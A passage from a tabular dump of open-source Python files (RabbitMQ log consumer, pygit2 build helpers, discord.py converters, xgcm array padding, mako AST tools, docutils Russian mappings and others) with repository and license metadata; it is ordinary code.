repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
bkolowitz/IADSS | ml/receive_logs_direct.py | 2 | 1050 | __author__ = 'parallels'
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.CRITICAL)
import pika
import sys
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='direct_logs',
type='direct')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
severities = sys.argv[1:]
if not severities:
print >> sys.stderr, "Usage: %s [info] [warning] [error]" % \
(sys.argv[0],)
sys.exit(1)
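# Hedged example invocation (severity names assumed from the usage string above):
#   python receive_logs_direct.py info warning error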
for severity in severities:
channel.queue_bind(exchange='direct_logs',
queue=queue_name,
routing_key=severity)
print ' [*] Waiting for logs. To exit press CTRL+C'
def callback(ch, method, properties, body):
print " [x] %r:%r" % (method.routing_key, body,)
channel.basic_consume(callback,
queue=queue_name,
no_ack=True)
channel.start_consuming() | apache-2.0 |
uwcirg/true_nth_usa_portal | portal/models/qbd.py | 1 | 2760 | """QBD (Questionnaire Bank Details) Module"""
from ..date_tools import FHIR_datetime
class QBD(object):
"""Details needed to define a QB"""
def __init__(
self, relative_start, iteration, recur=None, recur_id=None,
questionnaire_bank=None, qb_id=None):
"""Hold details needed to uniquely define a QB visit
For db objects ``questionnaire_bank`` and ``recur``, provide either
the id or object version of each, not both. If the other is requested,
it'll be looked up and cached.
:param relative_start: UTC datetime value marking start point for QBD
:param iteration: None w/o a recurrence, otherwise a zero indexed int
:param recur: If the qb has one or more recurrences, set to the correct
recurrence, or alternatively pass a ``recur_id`` value.
:param recur_id: foreign key value for recur, if object not at hand
:param questionnaire_bank: The QB for the QBD, or alternatively pass
a ``qb_id`` value.
:param qb_id: foreign key value for the questionnaire_bank
"""
if recur and recur_id:
raise ValueError("expect *either* recur itself or id, not both")
if questionnaire_bank and qb_id:
raise ValueError("expect *either* QB itself or id, not both")
self.relative_start = relative_start
self.iteration = iteration
self._recur = recur
self.recur_id = recur.id if recur else recur_id
self._questionnaire_bank = questionnaire_bank
self.qb_id = questionnaire_bank.id if questionnaire_bank else qb_id
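# Illustrative sketch of the lazy lookup behaviour (the id value is hypothetical):
#   qbd = QBD(relative_start=some_utc_datetime, iteration=None, qb_id=42)
#   qbd.questionnaire_bank  # triggers QuestionnaireBank.query.get(42) and caches it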
@property
def recur(self):
from .recur import Recur
if not self._recur and self.recur_id is not None:
self._recur = Recur.query.get(self.recur_id)
return self._recur
@property
def questionnaire_bank(self):
from .questionnaire_bank import QuestionnaireBank
if not self._questionnaire_bank and self.qb_id is not None:
self._questionnaire_bank = QuestionnaireBank.query.get(self.qb_id)
return self._questionnaire_bank
@questionnaire_bank.setter
def questionnaire_bank(self, qb):
self.qb_id = qb.id
self._questionnaire_bank = qb
def as_json(self):
from ..models.questionnaire_bank import visit_name
results = {}
results['questionnaire_bank'] = (
self.questionnaire_bank.as_json()
if self.questionnaire_bank else None)
results['relative_start'] = (
FHIR_datetime.as_fhir(self.relative_start)
if self.relative_start else None)
results['iteration'] = self.iteration
results['visit'] = visit_name(self)
return results
| bsd-3-clause |
piquadrat/mygit2 | pygit2/_build.py | 2 | 2071 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2015 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
"""
This is a special module: it provides stuff used by setup.py at build time,
but it is also used by pygit2 at run time.
"""
# Import from the Standard Library
import os
from os import getenv
#
# The version number of pygit2
#
__version__ = '0.24.0'
#
# Utility functions to get the paths required for building extensions
#
def _get_libgit2_path():
# LIBGIT2 environment variable takes precedence
libgit2_path = getenv("LIBGIT2")
if libgit2_path is not None:
return libgit2_path
# Default
if os.name == 'nt':
return '%s\\libgit2' % getenv("ProgramFiles")  # escape the backslash so the path is literal
return '/usr/local'
def get_libgit2_paths():
libgit2_path = _get_libgit2_path()
return (
os.path.join(libgit2_path, 'bin'),
os.path.join(libgit2_path, 'include'),
getenv('LIBGIT2_LIB', os.path.join(libgit2_path, 'lib')),
)
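# Hedged example of the resulting tuple on a non-Windows host with no
# environment overrides (values follow the '/usr/local' default above):
#   ('/usr/local/bin', '/usr/local/include', '/usr/local/lib')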
| gpl-2.0 |
jaruba/chromium.src | build/android/pylib/utils/json_results_generator_unittest.py | 87 | 7184 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Most of this file was ported over from Blink's
# webkitpy/layout_tests/layout_package/json_results_generator_unittest.py
#
import unittest
import json
from pylib.utils import json_results_generator
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_name = 'DUMMY_BUILD_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
self._orig_write_json = json_results_generator.WriteJSON
# unused arguments ... pylint: disable=W0613
def _WriteJSONStub(json_object, file_path, callback=None):
pass
json_results_generator.WriteJSON = _WriteJSONStub
def tearDown(self):
json_results_generator.WriteJSON = self._orig_write_json
def _TestJSONGeneration(self, passed_tests_list, failed_tests_list):
tests_set = set(passed_tests_list) | set(failed_tests_list)
DISABLED_tests = set([t for t in tests_set
if t.startswith('DISABLED_')])
FLAKY_tests = set([t for t in tests_set
if t.startswith('FLAKY_')])
FAILS_tests = set([t for t in tests_set
if t.startswith('FAILS_')])
PASS_tests = tests_set - (DISABLED_tests | FLAKY_tests | FAILS_tests)
failed_tests = set(failed_tests_list) - DISABLED_tests
failed_count_map = dict([(t, 1) for t in failed_tests])
test_timings = {}
i = 0
for test in tests_set:
test_timings[test] = float(self._num_runs * 100 + i)
i += 1
test_results_map = dict()
for test in tests_set:
test_results_map[test] = json_results_generator.TestResult(
test, failed=(test in failed_tests),
elapsed_time=test_timings[test])
generator = json_results_generator.JSONResultsGeneratorBase(
self.builder_name, self.build_name, self.build_number,
'',
None, # don't fetch past json results archive
test_results_map)
failed_count_map = dict([(t, 1) for t in failed_tests])
# Test incremental json results
incremental_json = generator.GetJSON()
self._VerifyJSONResults(
tests_set,
test_timings,
failed_count_map,
len(PASS_tests),
len(DISABLED_tests),
len(FLAKY_tests),
len(DISABLED_tests | failed_tests),
incremental_json,
1)
# We don't verify the results here, but at least we make sure the code
# runs without errors.
generator.GenerateJSONOutput()
generator.GenerateTimesMSFile()
def _VerifyJSONResults(self, tests_set, test_timings, failed_count_map,
PASS_count, DISABLED_count, FLAKY_count,
fixable_count, json_obj, num_runs):
# Aliasing to a short name for better access to its constants.
JRG = json_results_generator.JSONResultsGeneratorBase
self.assertIn(JRG.VERSION_KEY, json_obj)
self.assertIn(self.builder_name, json_obj)
buildinfo = json_obj[self.builder_name]
self.assertIn(JRG.FIXABLE, buildinfo)
self.assertIn(JRG.TESTS, buildinfo)
self.assertEqual(len(buildinfo[JRG.BUILD_NUMBERS]), num_runs)
self.assertEqual(buildinfo[JRG.BUILD_NUMBERS][0], self.build_number)
if tests_set or DISABLED_count:
fixable = {}
for fixable_items in buildinfo[JRG.FIXABLE]:
for (result_type, count) in fixable_items.iteritems():
if result_type in fixable:
fixable[result_type] = fixable[result_type] + count
else:
fixable[result_type] = count
if PASS_count:
self.assertEqual(fixable[JRG.PASS_RESULT], PASS_count)
else:
self.assertTrue(JRG.PASS_RESULT not in fixable or
fixable[JRG.PASS_RESULT] == 0)
if DISABLED_count:
self.assertEqual(fixable[JRG.SKIP_RESULT], DISABLED_count)
else:
self.assertTrue(JRG.SKIP_RESULT not in fixable or
fixable[JRG.SKIP_RESULT] == 0)
if FLAKY_count:
self.assertEqual(fixable[JRG.FLAKY_RESULT], FLAKY_count)
else:
self.assertTrue(JRG.FLAKY_RESULT not in fixable or
fixable[JRG.FLAKY_RESULT] == 0)
if failed_count_map:
tests = buildinfo[JRG.TESTS]
for test_name in failed_count_map.iterkeys():
test = self._FindTestInTrie(test_name, tests)
failed = 0
for result in test[JRG.RESULTS]:
if result[1] == JRG.FAIL_RESULT:
failed += result[0]
self.assertEqual(failed_count_map[test_name], failed)
timing_count = 0
for timings in test[JRG.TIMES]:
if timings[1] == test_timings[test_name]:
timing_count = timings[0]
self.assertEqual(1, timing_count)
if fixable_count:
self.assertEqual(sum(buildinfo[JRG.FIXABLE_COUNT]), fixable_count)
def _FindTestInTrie(self, path, trie):
nodes = path.split('/')
sub_trie = trie
for node in nodes:
self.assertIn(node, sub_trie)
sub_trie = sub_trie[node]
return sub_trie
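# Illustrative walk (test name hypothetical): for the path 'foo/bar/baz.html'
# this asserts and descends through trie['foo']['bar'] and returns
# trie['foo']['bar']['baz.html'].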
def testJSONGeneration(self):
self._TestJSONGeneration([], [])
self._TestJSONGeneration(['A1', 'B1'], [])
self._TestJSONGeneration([], ['FAILS_A2', 'FAILS_B2'])
self._TestJSONGeneration(['DISABLED_A3', 'DISABLED_B3'], [])
self._TestJSONGeneration(['A4'], ['B4', 'FAILS_C4'])
self._TestJSONGeneration(['DISABLED_C5', 'DISABLED_D5'], ['A5', 'B5'])
self._TestJSONGeneration(
['A6', 'B6', 'FAILS_C6', 'DISABLED_E6', 'DISABLED_F6'],
['FAILS_D6'])
# Generate JSON with the same test sets. (Both incremental results and
# archived results must be updated appropriately.)
self._TestJSONGeneration(
['A', 'FLAKY_B', 'DISABLED_C'],
['FAILS_D', 'FLAKY_E'])
self._TestJSONGeneration(
['A', 'DISABLED_C', 'FLAKY_E'],
['FLAKY_B', 'FAILS_D'])
self._TestJSONGeneration(
['FLAKY_B', 'DISABLED_C', 'FAILS_D'],
['A', 'FLAKY_E'])
def testHierarchicalJSONGeneration(self):
# FIXME: Re-work tests to be more comprehensible and comprehensive.
self._TestJSONGeneration(['foo/A'], ['foo/B', 'bar/C'])
def testTestTimingsTrie(self):
individual_test_timings = []
individual_test_timings.append(
json_results_generator.TestResult(
'foo/bar/baz.html',
elapsed_time=1.2))
individual_test_timings.append(
json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.TestTimingsTrie(individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
| bsd-3-clause |
Aurous/Magic-Discord-Bot | discord/ext/commands/converter.py | 1 | 5485 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import discord
import asyncio
import inspect  # required by ColourConverter.convert below
import re
from .errors import BadArgument, NoPrivateMessage
__all__ = [ 'Converter', 'MemberConverter', 'UserConverter',
'ChannelConverter', 'InviteConverter', 'RoleConverter',
'GameConverter', 'ColourConverter' ]
def _get_from_servers(bot, getter, argument):
result = None
for server in bot.servers:
result = getattr(server, getter)(argument)
if result:
return result
return result
class Converter:
"""The base class of custom converters that require the :class:`Context`
to be passed to be useful.
This allows you to implement converters that function similar to the
special cased ``discord`` classes.
Classes that derive from this should override the :meth:`convert` method
to do its conversion logic. This method could be a coroutine or a regular
function.
Attributes
-----------
ctx: :class:`Context`
The invocation context that the argument is being used in.
argument: str
The argument that is being converted.
"""
def __init__(self, ctx, argument):
self.ctx = ctx
self.argument = argument
def convert(self):
raise NotImplementedError('Derived classes need to implement this.')
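# Hedged sketch of a derived converter (class name and logic are illustrative,
# not part of this module):
#   class UpperConverter(Converter):
#       def convert(self):
#           return self.argument.upper()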
class MemberConverter(Converter):
def convert(self):
message = self.ctx.message
bot = self.ctx.bot
match = re.match(r'<@!?([0-9]+)>$', self.argument)
server = message.server
result = None
if match is None:
# not a mention...
if server:
result = server.get_member_named(self.argument)
else:
result = _get_from_servers(bot, 'get_member_named', self.argument)
else:
user_id = match.group(1)
if server:
result = server.get_member(user_id)
else:
result = _get_from_servers(bot, 'get_member', user_id)
if result is None:
raise BadArgument('Member "{}" not found'.format(self.argument))
return result
UserConverter = MemberConverter
class ChannelConverter(Converter):
def convert(self):
message = self.ctx.message
bot = self.ctx.bot
match = re.match(r'<#([0-9]+)>$', self.argument)
result = None
server = message.server
if match is None:
# not a mention
if server:
result = discord.utils.get(server.channels, name=self.argument)
else:
result = discord.utils.get(bot.get_all_channels(), name=self.argument)
else:
channel_id = match.group(1)
if server:
result = server.get_channel(channel_id)
else:
result = _get_from_servers(bot, 'get_channel', channel_id)
if result is None:
raise BadArgument('Channel "{}" not found.'.format(self.argument))
return result
class ColourConverter(Converter):
def convert(self):
arg = self.argument.replace('0x', '').lower()
if arg.startswith('#'):  # avoids an IndexError on an empty argument
arg = arg[1:]
try:
value = int(arg, base=16)
return discord.Colour(value=value)
except ValueError:
method = getattr(discord.Colour, arg, None)
if method is None or not inspect.ismethod(method):
raise BadArgument('Colour "{}" is invalid.'.format(arg))
return method()
class RoleConverter(Converter):
def convert(self):
server = self.ctx.message.server
if not server:
raise NoPrivateMessage()
match = re.match(r'<@&([0-9]+)>$', self.argument)
params = dict(id=match.group(1)) if match else dict(name=self.argument)
result = discord.utils.get(server.roles, **params)
if result is None:
raise BadArgument('Role "{}" not found.'.format(self.argument))
return result
class GameConverter(Converter):
def convert(self):
return discord.Game(name=self.argument)
class InviteConverter(Converter):
@asyncio.coroutine
def convert(self):
try:
invite = yield from self.ctx.bot.get_invite(self.argument)
return invite
except Exception as e:
raise BadArgument('Invite is invalid or expired') from e
| gpl-3.0 |
gregmuellegger/django-superform | setup.py | 1 | 1935 | # -*- coding: utf-8 -*-
import codecs
import re
from os import path
from distutils.core import setup
from setuptools import find_packages
def read(*parts):
return codecs.open(path.join(path.dirname(__file__), *parts),
encoding='utf-8').read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='django-superform',
version=find_version('django_superform', '__init__.py'),
author=u'Gregor Müllegger',
author_email='gregor@muellegger.de',
packages=find_packages(),
include_package_data=True,
url='https://github.com/gregmuellegger/django-superform',
license='BSD licence, see LICENSE file',
description='So much easier handling of formsets.',
long_description=u'\n\n'.join((
read('README.rst'),
read('CHANGES.rst'))),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.4',
'Framework :: Django :: 1.6',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
zip_safe=False,
)
| bsd-3-clause |
xgcm/xgcm | xgcm/duck_array_ops.py | 1 | 5381 | """Compatibility module defining operations on duck numpy-arrays.
Shamelessly copied from xarray."""
import numpy as np
try:
import dask.array as dsa
has_dask = True
except ImportError:
has_dask = False
def _dask_or_eager_func(name, eager_module=np, list_of_args=False, n_array_args=1):
"""Create a function that dispatches to dask for dask array inputs."""
if has_dask:
def f(*args, **kwargs):
dispatch_args = args[0] if list_of_args else args
if any(isinstance(a, dsa.Array) for a in dispatch_args[:n_array_args]):
module = dsa
else:
module = eager_module
return getattr(module, name)(*args, **kwargs)
else:
def f(data, *args, **kwargs):
return getattr(eager_module, name)(data, *args, **kwargs)
return f
insert = _dask_or_eager_func("insert")
take = _dask_or_eager_func("take")
concatenate = _dask_or_eager_func("concatenate", list_of_args=True)
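# Hedged dispatch example (arrays hypothetical): concatenate([np_a, np_b])
# resolves to np.concatenate, while concatenate([dask_a, np_b]) resolves
# to dask.array.concatenate.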
def _apply_boundary_condition(da, dim, left, boundary=None, fill_value=0.0):
"""Supply boundary conditions for an xarray.DataArray da according along
the specified dimension. Returns a raw dask or numpy array, depending on
the underlying data.
Parameters
----------
da : xarray.DataArray
The data on which to operate
dim : str
Dimension along which to act
left : bool
If `True`, boundary condition is at left (beginning of array).
If `False`, boundary condition is at the right (end of the array).
boundary : {'fill', 'extend', 'extrapolate'}
A flag indicating how the boundary values are determined.
* 'fill': All values outside the array set to fill_value
(i.e. a Dirichlet boundary condition.)
* 'extend': Set values outside the array to the nearest array
value. (i.e. a limited form of Neumann boundary condition.)
* 'extrapolate': Set values by extrapolating linearly from the two
points nearest to the edge
fill_value : float, optional
The value to use in the boundary condition with `boundary='fill'`.
"""
if boundary not in ["fill", "extend", "extrapolate"]:
raise ValueError(
"`boundary` must be 'fill', 'extend' or "
"'extrapolate', not %r." % boundary
)
axis_num = da.get_axis_num(dim)
# the shape for the edge array
shape = list(da.shape)
shape[axis_num] = 1
base_array = da.data
index = slice(0, 1) if left else slice(-1, None)
edge_array = da.isel(**{dim: index}).data
use_dask = has_dask and isinstance(base_array, dsa.Array)
if boundary == "extend":
boundary_array = edge_array
elif boundary == "fill":
args = shape, fill_value
kwargs = {"dtype": base_array.dtype}
if use_dask:
full_func = dsa.full
kwargs["chunks"] = edge_array.chunks
else:
full_func = np.full
boundary_array = full_func(*args, **kwargs)
elif boundary == "extrapolate":
gradient_slice = slice(0, 2) if left else slice(-2, None)
gradient_sign = -1 if left else 1
linear_gradient = da.isel(**{dim: gradient_slice}).diff(dim=dim).data
boundary_array = edge_array + gradient_sign * linear_gradient
return boundary_array
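# Hedged usage sketch (assumes an xarray.DataArray ``da`` with a dimension 'x'):
#   left_edge = _apply_boundary_condition(da, 'x', left=True,
#                                         boundary='fill', fill_value=0.0)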
def _pad_array(da, dim, left=False, boundary=None, fill_value=0.0):
"""
Pad an xarray.DataArray da according to the boundary conditions along dim.
Return a raw dask or numpy array, depending on the underlying data.
Parameters
----------
da : xarray.DataArray
The data on which to operate
dim : str
Dimension to pad
left : bool
If `False`, data is padded at the right (end of the array). If `True`,
padded at left (beginning of array).
boundary : {'fill', 'extend'}
A flag indicating how to handle boundaries:
* None: Do not apply any boundary conditions. Raise an error if
boundary conditions are required for the operation.
* 'fill': Set values outside the array boundary to fill_value
(i.e. a Dirichlet boundary condition.)
* 'extend': Set values outside the array to the nearest array
value. (i.e. a limited form of Neumann boundary condition.)
fill_value : float, optional
The value to use in the boundary condition with `boundary='fill'`.
"""
if boundary not in ["fill", "extend"]:
raise ValueError("`boundary` must be `'fill'` or `'extend'`")
axis_num = da.get_axis_num(dim)
shape = list(da.shape)
shape[axis_num] = 1
base_array = da.data
index = slice(0, 1) if left else slice(-1, None)
edge_array = da.isel(**{dim: index}).data
use_dask = has_dask and isinstance(base_array, dsa.Array)
if boundary == "extend":
boundary_array = edge_array
elif boundary == "fill":
args = shape, fill_value
kwargs = {"dtype": base_array.dtype}
if use_dask:
full_func = dsa.full
kwargs["chunks"] = edge_array.chunks
else:
full_func = np.full
boundary_array = full_func(*args, **kwargs)
arrays_to_concat = [base_array, boundary_array]
if left:
arrays_to_concat.reverse()
return concatenate(arrays_to_concat, axis=axis_num)
| mit |
agiliq/django-graphos | demo_project/static/admin/js/compress.py | 784 | 1896 | #!/usr/bin/env python
import os
import optparse
import subprocess
import sys
here = os.path.dirname(__file__)
def main():
usage = "usage: %prog [file1..fileN]"
description = """With no file paths given this script will automatically
compress all jQuery-based files of the admin app. Requires the Google Closure
Compiler library and Java version 6 or later."""
parser = optparse.OptionParser(usage, description=description)
parser.add_option("-c", dest="compiler", default="~/bin/compiler.jar",
help="path to Closure Compiler jar file")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose")
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose")
(options, args) = parser.parse_args()
compiler = os.path.expanduser(options.compiler)
if not os.path.exists(compiler):
sys.exit("Google Closure compiler jar file %s not found. Please use the -c option to specify the path." % compiler)
if not args:
if options.verbose:
sys.stdout.write("No filenames given; defaulting to admin scripts\n")
args = [os.path.join(here, f) for f in [
"actions.js", "collapse.js", "inlines.js", "prepopulate.js"]]
for arg in args:
if not arg.endswith(".js"):
arg = arg + ".js"
to_compress = os.path.expanduser(arg)
if os.path.exists(to_compress):
to_compress_min = "%s.min.js" % "".join(arg.rsplit(".js"))
cmd = "java -jar %s --js %s --js_output_file %s" % (compiler, to_compress, to_compress_min)
if options.verbose:
sys.stdout.write("Running: %s\n" % cmd)
subprocess.call(cmd.split())
else:
sys.stdout.write("File %s not found. Sure it exists?\n" % to_compress)
if __name__ == '__main__':
main()
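# Hedged example invocation (compiler path hypothetical; -c is optional when
# the jar sits at the ~/bin/compiler.jar default):
#   python compress.py -c ~/bin/compiler.jar actions.js inlines.js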
| bsd-2-clause |
weisongchen/flaskapp | venv/lib/python2.7/site-packages/mako/ast.py | 61 | 6635 | # mako/ast.py
# Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""utilities for analyzing expressions and blocks of Python
code, as well as generating Python from AST nodes"""
from mako import exceptions, pyparser, compat
import re
class PythonCode(object):
"""represents information about a string containing Python code"""
def __init__(self, code, **exception_kwargs):
self.code = code
# represents all identifiers which are assigned to at some point in
# the code
self.declared_identifiers = set()
# represents all identifiers which are referenced before their
# assignment, if any
self.undeclared_identifiers = set()
# note that an identifier can be in both the undeclared and declared
# lists.
# using AST to parse instead of using code.co_varnames,
# code.co_names has several advantages:
# - we can locate an identifier as "undeclared" even if
# its declared later in the same block of code
# - AST is less likely to break with version changes
# (for example, the behavior of co_names changed a little bit
# in python version 2.5)
if isinstance(code, compat.string_types):
expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindIdentifiers(self, **exception_kwargs)
f.visit(expr)
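# Illustrative sketch (identifier sets follow the comments above; values assumed):
#   pc = PythonCode("x = y + 1")
#   pc.declared_identifiers    # {'x'}
#   pc.undeclared_identifiers  # {'y'}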
class ArgumentList(object):
"""parses a fragment of code as a comma-separated list of expressions"""
def __init__(self, code, **exception_kwargs):
self.codeargs = []
self.args = []
self.declared_identifiers = set()
self.undeclared_identifiers = set()
if isinstance(code, compat.string_types):
if re.match(r"\S", code) and not re.match(r",\s*$", code):
# if there's text and no trailing comma, ensure it's parsed
# as a tuple by adding a trailing comma
code += ","
expr = pyparser.parse(code, "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindTuple(self, PythonCode, **exception_kwargs)
f.visit(expr)
class PythonFragment(PythonCode):
"""extends PythonCode to provide identifier lookups in partial control
statements
e.g.
for x in 5:
elif y==9:
except (MyException, e):
etc.
"""
def __init__(self, code, **exception_kwargs):
m = re.match(r'^(\w+)(?:\s+(.*?))?:\s*(#|$)', code.strip(), re.S)
if not m:
raise exceptions.CompileException(
"Fragment '%s' is not a partial control statement" %
code, **exception_kwargs)
if m.group(3):
code = code[:m.start(3)]
(keyword, expr) = m.group(1, 2)
if keyword in ['for', 'if', 'while']:
code = code + "pass"
elif keyword == 'try':
code = code + "pass\nexcept:pass"
elif keyword == 'elif' or keyword == 'else':
code = "if False:pass\n" + code + "pass"
elif keyword == 'except':
code = "try:pass\n" + code + "pass"
elif keyword == 'with':
code = code + "pass"
else:
raise exceptions.CompileException(
"Unsupported control keyword: '%s'" %
keyword, **exception_kwargs)
super(PythonFragment, self).__init__(code, **exception_kwargs)
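# Illustrative padding (fragments from the docstring above): 'for x in 5:'
# is parsed as 'for x in 5:pass', and 'except (MyException, e):' is parsed
# as 'try:pass\nexcept (MyException, e):pass'.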
class FunctionDecl(object):
"""function declaration"""
def __init__(self, code, allow_kwargs=True, **exception_kwargs):
self.code = code
expr = pyparser.parse(code, "exec", **exception_kwargs)
f = pyparser.ParseFunc(self, **exception_kwargs)
f.visit(expr)
if not hasattr(self, 'funcname'):
raise exceptions.CompileException(
"Code '%s' is not a function declaration" % code,
**exception_kwargs)
if not allow_kwargs and self.kwargs:
raise exceptions.CompileException(
"'**%s' keyword argument not allowed here" %
self.kwargnames[-1], **exception_kwargs)
def get_argument_expressions(self, as_call=False):
"""Return the argument declarations of this FunctionDecl as a printable
list.
By default the return value is appropriate for writing in a ``def``;
set `as_call` to true to build arguments to be passed to the function
instead (assuming locals with the same names as the arguments exist).
"""
namedecls = []
# Build in reverse order, since defaults and slurpy args come last
argnames = self.argnames[::-1]
kwargnames = self.kwargnames[::-1]
defaults = self.defaults[::-1]
kwdefaults = self.kwdefaults[::-1]
# Named arguments
if self.kwargs:
namedecls.append("**" + kwargnames.pop(0))
for name in kwargnames:
# Keyword-only arguments must always be used by name, so even if
# this is a call, print out `foo=foo`
if as_call:
namedecls.append("%s=%s" % (name, name))
elif kwdefaults:
default = kwdefaults.pop(0)
if default is None:
# The AST always gives kwargs a default, since you can do
# `def foo(*, a=1, b, c=3)`
namedecls.append(name)
else:
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
else:
namedecls.append(name)
# Positional arguments
if self.varargs:
namedecls.append("*" + argnames.pop(0))
for name in argnames:
if as_call or not defaults:
namedecls.append(name)
else:
default = defaults.pop(0)
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
namedecls.reverse()
return namedecls
@property
def allargnames(self):
return tuple(self.argnames) + tuple(self.kwargnames)
class FunctionArgs(FunctionDecl):
"""the argument portion of a function declaration"""
def __init__(self, code, **kwargs):
super(FunctionArgs, self).__init__("def ANON(%s):pass" % code,
**kwargs)
| mit |
Linktime/Aike | Aike/wsgi.py | 1 | 1158 | """
WSGI config for Aike project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Aike.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| apache-2.0 |
agconti/njode | env/lib/python2.7/site-packages/docutils/parsers/rst/languages/ru.py | 128 | 3306 | # -*- coding: utf-8 -*-
# $Id: ru.py 7123 2011-09-12 08:28:31Z milde $
# Author: Roman Suzi <rnd@onego.ru>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Russian-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
u'блок-строк': u'line-block',
u'meta': u'meta',
u'математика': 'math',
u'обработанный-литерал': u'parsed-literal',
u'выделенная-цитата': u'pull-quote',
u'код': 'code',
u'compound (translation required)': 'compound',
u'контейнер': 'container',
u'таблица': 'table',
u'csv-table (translation required)': 'csv-table',
u'list-table (translation required)': 'list-table',
u'сырой': u'raw',
u'замена': u'replace',
u'тестовая-директива-restructuredtext': u'restructuredtext-test-directive',
u'целевые-сноски': u'target-notes',
u'unicode': u'unicode',
u'дата': u'date',
u'боковая-полоса': u'sidebar',
u'важно': u'important',
u'включать': u'include',
u'внимание': u'attention',
u'выделение': u'highlights',
u'замечание': u'admonition',
u'изображение': u'image',
u'класс': u'class',
u'роль': 'role',
u'default-role (translation required)': 'default-role',
u'титул': 'title',
u'номер-раздела': u'sectnum',
u'нумерация-разделов': u'sectnum',
u'опасно': u'danger',
u'осторожно': u'caution',
u'ошибка': u'error',
u'подсказка': u'tip',
u'предупреждение': u'warning',
u'примечание': u'note',
u'рисунок': u'figure',
